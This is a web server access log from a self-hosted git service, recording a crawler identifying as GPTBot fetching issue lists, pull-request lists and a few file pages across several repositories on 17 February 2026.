"/windpacer/windpacer/pulls?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:19:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=open&type=all" +[17/Feb/2026:19:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 69130] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:19:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=open&type=all" +[17/Feb/2026:19:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:19:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:19:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:19:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15164] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fOpcConnectionTest.csproj" [Client 74.7.227.38] [Length 21957] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:19:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr 